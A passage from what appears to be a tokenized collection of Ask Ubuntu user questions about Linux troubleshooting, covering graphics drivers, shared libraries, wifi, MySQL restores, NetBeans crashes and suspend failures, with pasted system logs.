glx_arb_create_context , glx_arb_create_context_profile , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_swap_control , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_allocate_memory , glx_mesa_copy_sub_buffer , glx_mesa_swap_control , glx_mesa_swap_frame_usage , glx_nv_swap_group , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_swap_barrier , glx_sgix_swap_group , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_ext_framebuffer_srgb , glx_arb_fbconfig_float , glx_amd_gpu_association , glx_ext_buffer_age glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 2.1 ( 4.3.12438 compatibility profile context 13.20.5 ) opengl shading language version string : ( null ) opengl extensions : gl_arb_depth_texture , gl_arb_draw_buffers , gl_arb_fragment_program , gl_arb_fragment_program_shadow , gl_arb_imaging , gl_arb_multisample , gl_arb_multitexture , gl_arb_occlusion_query , gl_arb_point_parameters , gl_arb_point_sprite , gl_arb_shadow , gl_arb_shadow_ambient , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_mirrored_repeat , gl_arb_texture_non_power_of_two , gl_arb_texture_rectangle , gl_arb_transpose_matrix , gl_arb_vertex_buffer_object , gl_arb_vertex_program , gl_arb_window_pos , gl_arb_shader_objects , gl_arb_vertex_shader , gl_arb_fragment_shader , gl_arb_framebuffer_object , gl_arb_geometry_shader4 , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_equation_separate , gl_ext_blend_func_separate , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_copy_texture , gl_ext_draw_range_elements , gl_ext_fog_coord , gl_ext_framebuffer_object , gl_ext_multi_draw_arrays , gl_ext_packed_pixels , gl_ext_point_parameters , gl_ext_rescale_normal , gl_ext_secondary_color , gl_ext_separate_specular_color , gl_ext_shadow_funcs , gl_ext_stencil_wrap , gl_ext_subtexture , gl_ext_texture3d , gl_ext_texture_compression_s3tc , gl_ext_texture_edge_clamp , gl_ext_texture_env_add , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_ext_texture_lod , gl_ext_texture_lod_bias , gl_ext_texture_mirror_clamp , gl_ext_texture_object , gl_ext_texture_rectangle , gl_ext_vertex_array , gl_ext_histogram , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_geometry_shader4 , gl_ext_gpu_shader4 , gl_ati_draw_buffers , gl_ati_texture_env_combine3 , gl_ati_texture_mirror_once , gl_atix_texture_env_combine3 , gl_ibm_texture_mirrored_repeat , gl_ingr_blend_func_separate , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_sgix_shadow_ambient , gl_sun_multi_draw_arrays , gl_arb_texture_float and this is the output of fglrxinfo : setting of real/effective user id to 0/0 failed libgl error : open uki failed ( operation not permitted ) libgl error : reverting to ( slow ) indirect rendering display : :0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 2.1 ( 4.3.12438 compatibility profile context 13.20.5 ) how can i solve it ? thanks
332853	'error while loading shared libraries ' while running portable linux app	i downloaded many portable app images from http : //portablelinuxapps.org and works fine in ubuntu 10.04 . when i run it on ubuntu 12.10 i get error like error while loading shared libraries : libxcb-randr.so.0 : can not open shared object file : no such file or directory i think the problem due to load error in $ ld_library_path ld_library_path= '' ./lib : $ { ld_library_path } '' in some app images , after extracting app image , the following code fixes the problem but it break portability by adding data to system library ( also pollution ) and need root privilege . echo -e '\n/home/ubuntu/pgm/usr/lib ' | sudo tee -a /etc/ld.so.conf.d/pgm.conf sudo ldconfig how can i fix this without using root ( and system files ) .
332856	usb wifi is blocked by the hardware wifi switch	i have a dell xps m1530 laptop , and it 's a little dated , the physical wifi switch is broken , can not be switched on , so i bought a usb wifi dongle , but it did n't work , the network-manager detected that both the internal and usb wifi is switch off by the hardware switch , but it worked perfectly under windows , so i wonder how to bypass the hardware switch when using the usb wifi .
332862	how long should it take to install ubuntu onto a nexus 7 ?	i am trying to install ubuntu into my nexus 7 . i 'm manually installing ubuntu into my tablet because the other way gives me a checksum error . so i let it install and 10 hours later i came back and it was still installing . it says : sending 'userdata ' ( 717793 kb ) ... is this normal ?
332864	gigabyte z68ap-d3 and ubuntu	basically , i 've been trying to install ubuntu to dual boot alongside windows 7 . however , i 've had strange outcomes . i first tried to install ubuntu 13.04 . after problems with it , i tried ubuntu 12.10 , with similar problems . i seem to have issues with the graphics card and the wireless . more specifically : when i loaded the live cd ( and after i 'd installed ) i seem to have two desktops , at first `` overlayed '' each other ( i had two power down icons , wireless buttons ... with one screen in the nw of the screen and another `` wrapped around '' it ) . i only have one monitor plugged in ; on display , one shows up as samsung 19 '' , which is correct , and the other as `` unknown '' . i do n't know what this other display is or why it 's there . on ubuntu 13.04 , i could n't remove this problem ; i could move the display around so that it was n't visible but my mouse could move off screen onto it ( although of course i could n't see it ) . ubuntu 12.10 was more manageable and has turned off this other display , although it still appears in display settings . perhaps linked to this is that in the details , or about this computer window , it lists my graphics as `` unknown '' . my wireless connection , whilst working , tends to operate at terribly low speeds . i have a netbook running ubuntu 13.04 which has no problems like this . i 've also occasionally seen scrambled up orange desktop screens on boot , although this tends to go away after a couple of boots . i had a few times where the live cd failed to boot ( i 've tried ubuntu 13.04 on a usb and 12.10 on cd ) . another thing i 'd point out is that in the grub loader now , i have two entries for the windows loader and , as well as some memtest options , ubuntu , ubuntu recovery and `` older linux versions '' . perhaps this points to me incorrectly installing in the first place ? at the moment , ubuntu 12.10 is on my system , and seems to run much more smoothly than 13.04 . for the most part , it is completely usable , except for it 's horribly slow wireless connection . i worry of course that , with these strange issues , there will be many more lurking around that i ca n't see yet . i have n't given you too much information ; please tell me what information ( hardware , terminal outputs etc . ) i should give and how to get it ( please bear in mind that i 'm totally new to linux ) . given that i have several issues , i will note my motherboard : it 's a gigabyte ga-z68ap-d3 socket 1155 , and that my wireless card is pretty old ( windows failed to automatically find drivers for it ; i eventually found ralink rt2500 ones that worked ) . i 'm sure there are no hardware faults though , since everything runs fine on windows 7 . thanks [ edit ] : ok , so i think the problem is the motherboard , which does n't seem to get on too well with linux . i tried the following : http : //www.tutonics.com/2012/10/fix-graphics-unknown-in-ubuntu-1210.html # .ugzfg6wju1g and now at least my graphics do n't know up as `` unknown '' ( although i do still have an extra unknown monitor in displays ) . next i tried to sort out the wireless connection . i followed this : http : //alexravenel.com/gigabyte-ga-z68ap-d3-network-issues-in-ubuntu.html and the result is that now , instead of having a slow connection , i have no connection ; the wireless ca n't find any networks . any help would be much appreciated .
332870	how to fulfill libcdio-cdda0 dependency of skg jukebox ?	i am trying to install skg jukebox onto an old netbook ( asus aspire one ) with ubuntu installed on it . it says that there is a dependency for libcdio-cdda0 . but i cant work out how to add that . also this netbook is old and slow , and idealy i would like it to book into just a command line and then run skg in the hopes that it will run a bit quicker , is this possible ? further info as requested : i am downloading the debian package from here : http : //www.skgsoft.net/downloads the response from running lsb_release : no lsb modules are available distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise i am trying to install it by clicking on the downloaded .deb and it takes me to ubuntu software centre and that 's were it says there is a dependency . when i run apt-cache policy to get information about the package , i get : n : unable to locate package libcdio-cdda0
332871	strange folders and files in the .tmp folder	i run two computers with ubuntu 11.04 installed on one of them and ubuntu 12.04 on another one . both of them are connected to internet through one wireless router . i found that an identical set of files and folders have been plantet in .tmp folder on both of my computers despite the fact that they have different versions of os running on them . the names of files sound very suspicious and they look like a spyware . most of these files can not be deleted as they are locked for the comp owner . some of them can be removed , but replicate soon after that . i reformatted the hard drive of one of the comps and installed ubunt 12.04.02 lts freshly downloaded from the ubunt site . i intentionally disconnected the comp from the internet during installation to see if these files appear again in the .tmp folder . and they did . here the names of these files and folders : /tmp/keyring-ctcn6f /tmp/orbit-thierry /tmp/pulse-2l9k88emlgn7 /tmp/pulse-pkdhtxmmr18n /tmp/pulse-qagoc5amylra /tmp/ssh-tjoqmuck1524 /tmp/virtual-thierry.ozvf7i /tmp/unity_support_test.0 please , advise if they are legitimate for the ubuntu , which is hard to believe , and , if not , how to get rid of them ?
332876	how to move ubuntu installation to new drive	i am running ubuntu 13.04 on a 250 gb hdd . this hdd has developed bad sector and i received replaced drive from manufacturer . i am also running a raid1 using mdm . i want to move the existing setup to new hard drive . can someone please give suggestions . thanks for your answers . cheers .
332879	is there a tool to check the entire computer for errors ?	is there anything available in the world of ubuntu to have the entire laptop/pc checked for errors ? i am wondering if there is an application that comes on the live cd or can be installed to run and find even the slightest error that causes problems in a computer .
332882	backup mysql db on one server and restore on other , do i need the same version of mysql ?	i backupped my old db on ubuntu 10.10 server using mysql 5.1.49 using mysqldump now i want to restore the file on my other machine , using ubuntu 12.04 server with mysql version 5.5.32 on it . i managed to copy the files via rsync but i ca n't load the db . i tried it with : sudo mysql -u root -p fulldump.sql < fulldump.sql i get this error : error 1049 ( 42000 ) : unknown database 'fulldump.sql' but the name of the file is fulldump.sql and it 's the folder i am currently in of course . any ideas ?
332884	how to compile a c program that uses math.h ?	i am having problems in math.h header file and when i use square root function as in sqrt ( d ) . but my compiler is not supporting this . please advise me about this problem . my ubuntu version is 2012 .
332885	ca n't run netbeans as a normal user !	i have installed netbeans 7.3.1 on ubuntu 13.04 by running the `` netbeans-7.3.1-linux.sh '' file downloaded from netbeans.org the problem is whenever i run netbeans as normal user it stuck on loading modules and then exits and no error is displaying i have tried to run it by command line and get the following messages java hotspot ( tm ) client vm warning : ignoring option maxpermsize=384m ; support was removed in 8.0 java hotspot ( tm ) client vm warning : ignoring option permsize=32m ; support was removed in 8.0 a fatal error has been detected by the java runtime environment : sigsegv ( 0xb ) at pc=0x00000000 , pid=8810 , tid=2168195904 jre version : java ( tm ) se runtime environment ( 8.0-b100 ) ( build 1.8.0-ea-b100 ) java vm : java hotspot ( tm ) client vm ( 25.0-b42 mixed mode linux-x86 ) problematic frame : c 0x00000000 failed to write core dump . core dumps have been disabled . to enable core dumping , try ulimit -c unlimited '' before starting java again an error report file with more information is saved as : /home/nmaybar/hs_err_pid8810.log [ thread -2088768704 also had an error ] if you would like to submit a bug report , please visit : http : //bugreport.sun.com/bugreport/crash.jsp /home/nmaybar/netbeans-7.3.1/platform/lib/nbexec : line 610 : 8810 aborted ( core dumped ) `` /usr/lib/jvm/java-8-oracle/bin/java '' -djdk.home= '' /usr/lib/jvm/java-8-oracle '' -classpath `` /home/nmaybar/netbeans-7.3.1/platform/lib/boot.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/org-openide-modules.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/org-openide-util.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/org-openide-util-lookup.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/boot_ja.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/boot_pt_br.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/boot_ru.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/boot_zh_cn.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-modules_ja.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-modules_pt_br.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-modules_ru.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-modules_zh_cn.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util_ja.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util-lookup_ja.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util-lookup_pt_br.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util-lookup_ru.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util-lookup_zh_cn.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util_pt_br.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util_ru.jar : /home/nmaybar/netbeans-7.3.1/platform/lib/locale/org-openide-util_zh_cn.jar : /usr/lib/jvm/java-8-oracle/lib/dt.jar : /usr/lib/jvm/java-8-oracle/lib/tools.jar '' -dnetbeans.default_userdir_root= '' /home/nmaybar/.netbeans '' -dnetbeans.system_http_proxy= '' direct '' -dnetbeans.system_http_non_proxy_hosts= '' '' -dnetbeans.dirs= '' /home/nmaybar/netbeans-7.3.1/nb : /home/nmaybar/netbeans-7.3.1/ergonomics : /home/nmaybar/netbeans-7.3.1/ide : /home/nmaybar/netbeans-7.3.1/java : /home/nmaybar/netbeans-7.3.1/apisupport : /home/nmaybar/netbeans-7.3.1/webcommon : /home/nmaybar/netbeans-7.3.1/websvccommon : /home/nmaybar/netbeans-7.3.1/enterprise : /home/nmaybar/netbeans-7.3.1/mobility : /home/nmaybar/netbeans-7.3.1/profiler : /home/nmaybar/netbeans-7.3.1/python : /home/nmaybar/netbeans-7.3.1/php : /home/nmaybar/netbeans-7.3.1/identity : /home/nmaybar/netbeans-7.3.1/harness : /home/nmaybar/netbeans-7.3.1/cnd : /home/nmaybar/netbeans-7.3.1/dlight : /home/nmaybar/netbeans-7.3.1/groovy : /home/nmaybar/netbeans-7.3.1/extra : /home/nmaybar/netbeans-7.3.1/javacard : /home/nmaybar/netbeans-7.3.1/javafx : '' -dnetbeans.home= '' /home/nmaybar/netbeans-7.3.1/platform '' '-dnetbeans.importclass=org.netbeans.upgrade.autoupgrade ' '-dnetbeans.accept_license_class=org.netbeans.license.acceptlicense ' '-xx : maxpermsize=384m ' '-xmx768m ' '-client ' '-xss2m ' '-xms32m ' '-xx : permsize=32m ' '-dapple.laf.usescreenmenubar=true ' '-dapple.awt.graphics.usequartz=true ' '-dsun.java2d.noddraw=true ' '-dsun.java2d.dpiaware=true ' '-dsun.zip.disablememorymapping=true ' -xx : +heapdumponoutofmemoryerror -xx : heapdumppath= '' /home/nmaybar/.netbeans/7.3.1/var/log/heapdump.hprof '' org.netbeans.main -- userdir `` /home/nmaybar/.netbeans/7.3.1 '' `` -- cachedir '' `` /home/nmaybar/.cache/netbeans/7.3.1 '' `` -- branding '' `` nb '' 0 < & 0 nmaybar @ nmaybar-svs13118gab : ~ $ sudo netbeans-7.3.1/bin/netbeans java hotspot ( tm ) client vm warning : ignoring option maxpermsize=384m ; support was removed in 8.0 java hotspot ( tm ) client vm warning : ignoring option permsize=32m ; support was removed in 8.0 but when i run netbeans as root using sudo command it works . so what is the problem ? thanks for your help in advanced .
332891	ubuntu 12.04 lts suspension and hibernation do not work ( possibly solved for the hibernation,0 size of swap partition )	i have had a problem with suspending my computer , since i installed ubuntu 12.04 lts a month ago , dual boot with a windows 7 system.the `` suspend '' function does not work.whenever i suspend my system and then turn it on again , it just starts from the beginning , as if i had not suspended it , but shut it down . no open programs or documents are resumed where i left it.the same goes for hibernating my windows 7 system , which behaves as if it underwent a forced shutdown , whenever i try to resume from hibernating . since both systems have this problem , i think the latter lies in grub.when i installed ubuntu , i was kept too long on the installation screen after it was complete and , thinking it had frozen , i forced it to shutdown to start the new system . however , apparently the installation was not completely done , as i got a grub error after that , being unable to boot any system . i fixed it by running a grub fixing program through the ubuntu live cd , the name of which i can not recall.perhaps that program did not solve all the problems . i have no further problems with ubuntu so far . i had a linux mint installation before that , instead of ubuntu , with no such problem.can you suggest a way to fix this ?
332893	i cant upgrade my 8.04 ubuntu to 12.04	can anyone tell me how to do it ? i cant make my usb a bootable usb stick how did u guys upgrade it ?
332894	slowness while receiving updates in vmware 9.0 , what can i do ?	i 'm trying to install ubuntu 12.10 using vmware 9.0 . its taking very long time while retrieving file 31 out of 81 ( as shown ) and go so on . what to do ?
332906	unable to use static variable in c program	i am working on the some system calls.. i want to open the file by system call open ( ) somewhere in my code i used , static char message [ ] = `` hello , world '' ; but it is giving the error error : - static : command not found please assist .
332907	suspending does not work . ubuntu 12.04	i had set the swap file at 0 size , at installation , so i can not hibernate . however , my ram should do for the `` suspend '' function ( i think ) .but whenever i suspend my system , it just starts from the very beginning , i start ubuntu through grub , and nothing i left open is resumed.any suggestions or useful information about this ? sudo pm-is-supported -- suspend has no results ( only switches line and shows prompt ) . the results of dmesg | tail here : [ 2527.433782 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.251 len=32 tos=0x18 prec=0xa0 ttl=1 id=55586 proto=2 [ 2543.211635 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.1 len=32 tos=0x18 prec=0xa0 ttl=1 id=56610 proto=2 [ 2543.639630 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.251 len=32 tos=0x18 prec=0xa0 ttl=1 id=56866 proto=2 [ 2593.635269 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.251 len=32 tos=0x18 prec=0xa0 ttl=1 id=57122 proto=2 [ 2598.333195 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.1 len=32 tos=0x18 prec=0xa0 ttl=1 id=57634 proto=2 [ 2601.873373 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.251 len=32 tos=0x18 prec=0xa0 ttl=1 id=57890 proto=2 [ 2663.498023 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.1 len=32 tos=0x18 prec=0xa0 ttl=1 id=58914 proto=2 [ 2663.720701 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.251 len=32 tos=0x18 prec=0xa0 ttl=1 id=59170 proto=2 [ 2671.510645 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.1 len=32 tos=0x18 prec=0xa0 ttl=1 id=59682 proto=2 [ 2674.906641 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:9c:93:4e:16:04:10:08:00 src=192.168.2.2 dst=224.0.0.251 len=32 tos=0x18 prec=0xa0 ttl=1 id=59938 proto=2 the /var/log/pm-suspend.log file here : initial commandline parameters : thu aug 15 13:11:23 eest 2013 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux orestis-vaio 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux module size used by joydev 17694 0 arc4 12530 2 coretemp 13642 0 snd_hda_codedmesg | tailc_hdmi 32476 1 snd_hda_codec_realtek 79855 1 snd_hda_intel 34063 5 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec snd_seq_midi 13325 0 snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_rawmidi 30750 1 snd_seq_midi xt_hl 12522 6 ip6t_rt 12559 3 nf_conntrack_ipv6 14107 7 nf_defrag_ipv6 13413 1 nf_conntrack_ipv6 ipt_reject 12577 1 snd_seq_midi_event 14900 1 snd_seq_midi xt_log 17454 9 xt_limit 12712 12 xt_tcpudp 12604 18 snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event iwlwifi 399614 0 xt_addrtype 12714 4 mac80211 555272 1 iwlwifi microcode 23030 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq r592 18145 0 snd 83674 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device xt_state 12579 14 uvcvideo 78117 0 psmouse 102506 0 videobuf2_core 33025 1 uvcvideo cfg80211 208382 2 iwlwifi , mac80211 serio_raw 13216 0 ip6table_filter 12816 1 memstick 16606 1 r592 lpc_ich 17145 0 soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc ip6_tables 27686 2 ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12666 0 nf_conntrack_broadcast 12590 1 nf_conntrack_netbios_ns nf_nat_ftp 12705 0 nf_nat 25646 1 nf_nat_ftp nf_conntrack_ipv4 14531 9 nf_nat nf_defrag_ipv4 12730 1 nf_conntrack_ipv4 nf_conntrack_ftp 13453 1 nf_nat_ftp nf_conntrack 83300 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12811 1 ip_tables 27474 1 iptable_filter x_tables 29892 12 xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables sony_laptop 54939 0 mac_hid 13254 0 parport_pc 32867 0 ppdev 17114 0 rfcomm 47562 0 bnep 18240 2 bluetooth 211860 10 rfcomm , bnep binfmt_misc 17541 1 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp firewire_ohci 41034 0 firewire_core 64697 1 firewire_ohci sdhci_pci 18749 0 crc_itu_t 12708 1 firewire_core sdhci 33145 1 sdhci_pci video 19653 0 radeon 917945 3 ahci 25869 1 libahci 27338 1 ahci sky2 59074 0 ttm 88495 1 radeon drm_kms_helper 49259 1 radeon drm 290595 5 radeon , ttm , drm_kms_helper i2c_algo_bit 13565 1 radeon total used free shared buffers cached mem : 4015940 1529344 2486596 0 161020 818756 -/+ buffers/cache : 549568 3466372 swap : 0 0 0 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : sessions still open , not unmounting sessions still open , not unmounting sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . thu aug 15 13:11:24 eest 2013 : performing suspend initial commandline parameters : thu aug 15 13:13:10 eest 2013 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux orestis-vaio 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux module size used by xt_hl 12522 6 ip6t_rt 12559 3 nf_conntrack_ipv6 14107 7 nf_defrag_ipv6 13413 1 nf_conntrack_ipv6 ipt_reject 12577 1 xt_log 17454 9 xt_limit 12712 12 xt_tcpudp 12604 18 xt_addrtype 12714 4 xt_state 12579 14 ip6table_filter 12816 1 bnep 18240 2 ip6_tables 27686 2 ip6t_rt , ip6table_filter arc4 12530 2 snd_hda_codec_hdmi 32476 1 rfcomm 47562 0 snd_hda_codec_realtek 79855 1 bluetooth 211860 10 bnep , rfcomm nf_conntrack_netbios_ns 12666 0 nf_conntrack_broadcast 12590 1 nf_conntrack_netbios_ns nf_nat_ftp 12705 0 snd_hda_intel 34063 5 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel nf_nat 25646 1 nf_nat_ftp nf_conntrack_ipv4 14531 9 nf_nat nf_defrag_ipv4 12730 1 nf_conntrack_ipv4 nf_conntrack_ftp 13453 1 nf_nat_ftp nf_conntrack 83300 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp snd_hwdep 17765 1 snd_hda_codec iptable_filter 12811 1 uvcvideo 78117 0 snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec ip_tables 27474 1 iptable_filter videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core x_tables 29892 12 xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables parport_pc 32867 0 iwlwifi 399614 0 ppdev 17114 0 videobuf2_vmalloc 12861 1 uvcvideo joydev 17694 0 videobuf2_memops 13405 1 videobuf2_vmalloc r592 18145 0 snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi memstick 16606 1 r592 snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event psmouse 102506 0 coretemp 13642 0 serio_raw 13216 0 mac_hid 13254 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq sony_laptop 54939 0 lpc_ich 17145 0 mac80211 555272 1 iwlwifi snd 83674 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15092 1 snd cfg80211 208382 2 iwlwifi , mac80211 microcode 23030 0 snd_page_alloc 18573 2 snd_hda_intel , snd_pcm binfmt_misc 17541 1 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp firewire_ohci 41034 0 sdhci_pci 18749 0 firewire_core 64697 1 firewire_ohci sdhci 33145 1 sdhci_pci crc_itu_t 12708 1 firewire_core video 19653 0 radeon 917945 3 ttm 88495 1 radeon drm_kms_helper 49259 1 radeon ahci 25869 1 libahci 27338 1 ahci drm 290595 5 radeon , ttm , drm_kms_helper sky2 59074 0 i2c_algo_bit 13565 1 radeon total used free shared buffers cached mem : 4015940 766028 3249912 0 57888 292772 -/+ buffers/cache : 415368 3600572 swap : 0 0 0 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook 